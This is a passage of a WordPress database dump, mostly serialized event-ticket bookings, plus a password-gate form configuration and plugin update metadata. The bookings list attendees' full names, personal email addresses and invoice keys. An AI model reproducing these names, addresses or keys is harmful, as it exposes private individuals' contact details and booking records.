Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268191;s:11:\"invoice_key\";s:32:\"5532a1d1accb51d20ef4a447070d5775\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"elainedahl@yahoo.com\";s:4:\"name\";s:15:\"Elaine Dahlgren\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7144506,'DFL79438','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:5:\"Beth \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1676197800:1676244600\";s:8:\"event_id\";s:6:\"267730\";s:19:\"translated_event_id\";s:6:\"267730\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267955;s:11:\"invoice_key\";s:32:\"ad429eb4e041b3d16408d2cdc9ccd445\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:5:\"Beth \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7250458,'WNA72525','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"gai.lawson@gmail.com\";s:4:\"name\";s:10:\"Gai Lawson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1678617000:1678663800\";s:8:\"event_id\";s:6:\"268027\";s:19:\"translated_event_id\";s:6:\"268027\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268182;s:11:\"invoice_key\";s:32:\"ef743391ff79b54b1c6d8e689f094695\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"gai.lawson@gmail.com\";s:4:\"name\";s:10:\"Gai Lawson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7064738,'ENK36819','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:15:\"Lisa1lg@aol.com\";s:4:\"name\";s:9:\"Lisa Gage\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1674383400:1674387000\";s:8:\"event_id\";s:6:\"267570\";s:19:\"translated_event_id\";s:6:\"267570\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267742;s:11:\"invoice_key\";s:32:\"ee60735836f6ee73eff4175e85736f70\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:15:\"Lisa1lg@aol.com\";s:4:\"name\";s:9:\"Lisa Gage\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7064769,'OUJ15457','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"christo990@aol.com\";s:4:\"name\";s:10:\"Chris Gage\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1674383400:1674387000\";s:8:\"event_id\";s:6:\"267570\";s:19:\"translated_event_id\";s:6:\"267570\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267743;s:11:\"invoice_key\";s:32:\"ede38ecda66a69247ced7ff6d9f56c0e\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"christo990@aol.com\";s:4:\"name\";s:10:\"Chris Gage\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7136983,'passster','a:24:{s:8:\"headline\";s:14:\"Protected Area\";s:11:\"instruction\";s:519:\"<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\" style=\"text-align: center;\"><span style=\"font-size: 16pt; color: #23507d;\">This Area Requires A Member Password.<br>\n</span></p>\n<p class=\"\" style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><b>Please enter the last word in the title of Sri Harold’s lead article in the current issue of the Mystic World</b><br> (in lowercase letters).<br>\n</span></p>\n</div>\n</div>\n</div>\n</div>\";s:11:\"placeholder\";s:21:\"Enter your password..\";s:5:\"error\";s:26:\"Sorry, there was an error.\";s:12:\"button_label\";s:6:\"Unlock\";s:13:\"show_password\";b:0;s:21:\"form_background_color\";s:7:\"#FAFAFA\";s:19:\"headline_font_color\";s:7:\"#333333\";s:18:\"headline_font_size\";i:24;s:20:\"headline_font_weight\";i:500;s:22:\"instruction_font_color\";s:4:\"#000\";s:21:\"instruction_font_size\";i:16;s:23:\"instruction_font_weight\";i:300;s:23:\"button_background_color\";s:7:\"#6804cc\";s:17:\"button_font_color\";s:4:\"#fff\";s:29:\"button_background_color_hover\";s:7:\"#f28a27\";s:23:\"button_font_color_hover\";s:4:\"#fff\";s:14:\"form_max_width\";s:5:\"700px\";s:18:\"form_border_radius\";N;s:12:\"form_padding\";a:4:{s:3:\"top\";s:4:\"20px\";s:5:\"right\";s:4:\"20px\";s:6:\"bottom\";s:4:\"20px\";s:4:\"left\";s:4:\"20px\";}s:11:\"form_margin\";a:4:{s:3:\"top\";s:3:\"0px\";s:5:\"right\";s:3:\"0px\";s:6:\"bottom\";s:3:\"0px\";s:4:\"left\";s:3:\"0px\";}s:14:\"button_padding\";a:4:{s:3:\"top\";s:4:\"10px\";s:5:\"right\";s:4:\"10px\";s:6:\"bottom\";s:4:\"10px\";s:4:\"left\";s:4:\"10px\";}s:13:\"button_margin\";a:4:{s:3:\"top\";s:3:\"0px\";s:5:\"right\";s:3:\"0px\";s:6:\"bottom\";s:3:\"0px\";s:4:\"left\";s:3:\"0px\";}s:20:\"button_border_radius\";N;}','yes'),(7144146,'TBK90038','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"j_furmanek@msn.com\";s:4:\"name\";s:16:\"Justyna Furmanek\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1676197800:1676244600\";s:8:\"event_id\";s:6:\"267730\";s:19:\"translated_event_id\";s:6:\"267730\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267953;s:11:\"invoice_key\";s:32:\"e4dec28585379e6c512dd301afdbb2f5\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"j_furmanek@msn.com\";s:4:\"name\";s:16:\"Justyna Furmanek\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7065818,'RCZ50342','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:27:\"alexareevesmassey@gmail.com\";s:4:\"name\";s:4:\"Lexi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1674383400:1674387000\";s:8:\"event_id\";s:6:\"267570\";s:19:\"translated_event_id\";s:6:\"267570\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267745;s:11:\"invoice_key\";s:32:\"961e4e9f440a492cbcd8cea9a6a59282\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:27:\"alexareevesmassey@gmail.com\";s:4:\"name\";s:4:\"Lexi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7062701,'ZAJ99074','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:16:\"azpaulfh@aol.com\";s:4:\"name\";s:11:\"Paul Hanson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1674383400:1674387000\";s:8:\"event_id\";s:6:\"267570\";s:19:\"translated_event_id\";s:6:\"267570\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267741;s:11:\"invoice_key\";s:32:\"444dfd21627fe957bad73dd3ceedf0cf\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:16:\"azpaulfh@aol.com\";s:4:\"name\";s:11:\"Paul Hanson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7061228,'JET55973','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1674387900:1674392400\";s:8:\"event_id\";s:6:\"267433\";s:19:\"translated_event_id\";s:6:\"267433\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267739;s:11:\"invoice_key\";s:32:\"d75654de0b01c118f9b21300f8ba88e0\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7042954,'EPV44453','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"abbynagbe@gmail.com\";s:4:\"name\";s:4:\"Abby\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1674383400:1674387000\";s:8:\"event_id\";s:6:\"267570\";s:19:\"translated_event_id\";s:6:\"267570\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267703;s:11:\"invoice_key\";s:32:\"f9101eb82459488f21a39efffe50811d\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"abbynagbe@gmail.com\";s:4:\"name\";s:4:\"Abby\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7042932,'BND81763','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"abbynagbe@gmail.com\";s:4:\"name\";s:4:\"Abby\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1674387900:1674392400\";s:8:\"event_id\";s:6:\"267433\";s:19:\"translated_event_id\";s:6:\"267433\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267702;s:11:\"invoice_key\";s:32:\"b21375da8640b9fda50fd25a51157678\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"abbynagbe@gmail.com\";s:4:\"name\";s:4:\"Abby\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7452128,'rsssl_wp_version_detected','not-found','no'),(7016942,'DMP71445','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1673173800:1673177400\";s:8:\"event_id\";s:6:\"267577\";s:19:\"translated_event_id\";s:6:\"267577\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267614;s:11:\"invoice_key\";s:32:\"e223dd440e05bc3a5bfc8de4f66a003b\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7312295,'YEL51667','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"Kery Colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1679831100:1679835600\";s:8:\"event_id\";s:6:\"267433\";s:19:\"translated_event_id\";s:6:\"267433\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268261;s:11:\"invoice_key\";s:32:\"e44ed2a27c99a1529657ca7b1ac91699\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"Kery Colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7328893,'ZQS12163','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"gvg1328@telus.net\";s:4:\"name\";s:15:\"Gerald van Gogh\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1681036200:1681039800\";s:8:\"event_id\";s:6:\"268197\";s:19:\"translated_event_id\";s:6:\"268197\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268285;s:11:\"invoice_key\";s:32:\"31817e8e2b7113ae8845070d751d7859\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"gvg1328@telus.net\";s:4:\"name\";s:15:\"Gerald van Gogh\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7347866,'SMD96569','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:6:\"Joanne\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1681036200:1681039800\";s:8:\"event_id\";s:6:\"268197\";s:19:\"translated_event_id\";s:6:\"268197\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268375;s:11:\"invoice_key\";s:32:\"c579c078c1ac6a3e1b63e8c5141ad900\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:6:\"Joanne\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7351024,'AOX10183','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"utah.eckpres@gmail.com\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1681036200:1681039800\";s:8:\"event_id\";s:6:\"268197\";s:19:\"translated_event_id\";s:6:\"268197\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268382;s:11:\"invoice_key\";s:32:\"ed8d7351c007990220b239933d7376fb\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"utah.eckpres@gmail.com\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7332551,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.3.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.3.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.3.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.3.2-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.3.2\";s:7:\"version\";s:5:\"6.3.2\";s:11:\"php_version\";s:5:\"7.0.0\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1699376144;s:15:\"version_checked\";s:5:\"6.3.2\";s:12:\"translations\";a:0:{}}','no'),(7367404,'_site_transient_boldgrid_plugins_filtered','a:7:{s:39:\"boldgrid-easy-seo/boldgrid-easy-seo.php\";a:14:{s:4:\"Name\";s:17:\"BoldGrid Easy SEO\";s:9:\"PluginURI\";s:38:\"https://www.boldgrid.com/boldgrid-seo/\";s:7:\"Version\";s:6:\"1.6.11\";s:11:\"Description\";s:82:\"Easily manage your website\'s search engine optimization with Easy SEO by BoldGrid!\";s:6:\"Author\";s:31:\"BoldGrid <support@boldgrid.com>\";s:9:\"AuthorURI\";s:25:\"https://www.boldgrid.com/\";s:10:\"TextDomain\";s:5:\"bgseo\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:17:\"BoldGrid Easy SEO\";s:10:\"AuthorName\";s:31:\"BoldGrid <support@boldgrid.com>\";}s:47:\"boldgrid-inspirations/boldgrid-inspirations.php\";a:14:{s:4:\"Name\";s:21:\"BoldGrid Inspirations\";s:9:\"PluginURI\";s:47:\"https://www.boldgrid.com/boldgrid-inspirations/\";s:7:\"Version\";s:5:\"2.7.1\";s:11:\"Description\";s:177:\"Find inspiration, customize, and launch! BoldGrid Inspirations includes FREE WordPress themes and is the easiest way to launch a new WordPress site complete with custom content.\";s:6:\"Author\";s:31:\"BoldGrid <support@boldgrid.com>\";s:9:\"AuthorURI\";s:25:\"https://www.boldgrid.com/\";s:10:\"TextDomain\";s:21:\"boldgrid-inspirations\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:21:\"BoldGrid Inspirations\";s:10:\"AuthorName\";s:31:\"BoldGrid <support@boldgrid.com>\";}s:37:\"boldgrid-staging/boldgrid-staging.php\";a:14:{s:4:\"Name\";s:16:\"BoldGrid Staging\";s:9:\"PluginURI\";s:42:\"https://www.boldgrid.com/boldgrid-staging/\";s:7:\"Version\";s:5:\"1.5.1\";s:11:\"Description\";s:42:\"Edit your website in a staging environment\";s:6:\"Author\";s:31:\"BoldGrid.com <wpb@boldgrid.com>\";s:9:\"AuthorURI\";s:25:\"https://www.boldgrid.com/\";s:10:\"TextDomain\";s:16:\"boldgrid-staging\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:16:\"BoldGrid Staging\";s:10:\"AuthorName\";s:31:\"BoldGrid.com <wpb@boldgrid.com>\";}s:47:\"post-and-page-builder/post-and-page-builder.php\";a:14:{s:4:\"Name\";s:21:\"Post and Page Builder\";s:9:\"PluginURI\";s:103:\"https://www.boldgrid.com/boldgrid-editor/?utm_source=ppb-wp-repo&utm_medium=plugin-uri&utm_campaign=ppb\";s:7:\"Version\";s:6:\"1.23.1\";s:11:\"Description\";s:175:\"Customized drag and drop editing for posts and pages. The Post and Page Builder adds functionality to the existing TinyMCE Editor to give you easier control over your content.\";s:6:\"Author\";s:31:\"BoldGrid <support@boldgrid.com>\";s:9:\"AuthorURI\";s:87:\"https://www.boldgrid.com/?utm_source=ppb-wp-repo&utm_medium=author-uri&utm_campaign=ppb\";s:10:\"TextDomain\";s:15:\"boldgrid-editor\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:21:\"Post and Page Builder\";s:10:\"AuthorName\";s:31:\"BoldGrid <support@boldgrid.com>\";}s:63:\"post-and-page-builder-premium/post-and-page-builder-premium.php\";a:14:{s:4:\"Name\";s:29:\"Post and Page Builder Premium\";s:9:\"PluginURI\";s:60:\"https://www.boldgrid.com/wordpress-page-builder-by-boldgrid/\";s:7:\"Version\";s:5:\"1.1.1\";s:11:\"Description\";s:48:\"Premium extension for the Post and Page Builder.\";s:6:\"Author\";s:8:\"BoldGrid\";s:9:\"AuthorURI\";s:25:\"https://www.boldgrid.com/\";s:10:\"TextDomain\";s:28:\"post-and-page-buider-premium\";s:10:\"DomainPath\";s:11:\"/languagesD\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:29:\"Post and Page Builder Premium\";s:10:\"AuthorName\";s:8:\"BoldGrid\";}s:35:\"boldgrid-backup/boldgrid-backup.php\";a:14:{s:4:\"Name\";s:12:\"Total Upkeep\";s:9:\"PluginURI\";s:41:\"https://www.boldgrid.com/boldgrid-backup/\";s:7:\"Version\";s:6:\"1.15.6\";s:11:\"Description\";s:159:\"Automated backups, remote backup to Amazon S3 and Google Drive, stop website crashes before they happen and more. Total Upkeep is the backup solution you need.\";s:6:\"Author\";s:8:\"BoldGrid\";s:9:\"AuthorURI\";s:25:\"https://www.boldgrid.com/\";s:10:\"TextDomain\";s:15:\"boldgrid-backup\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:12:\"Total 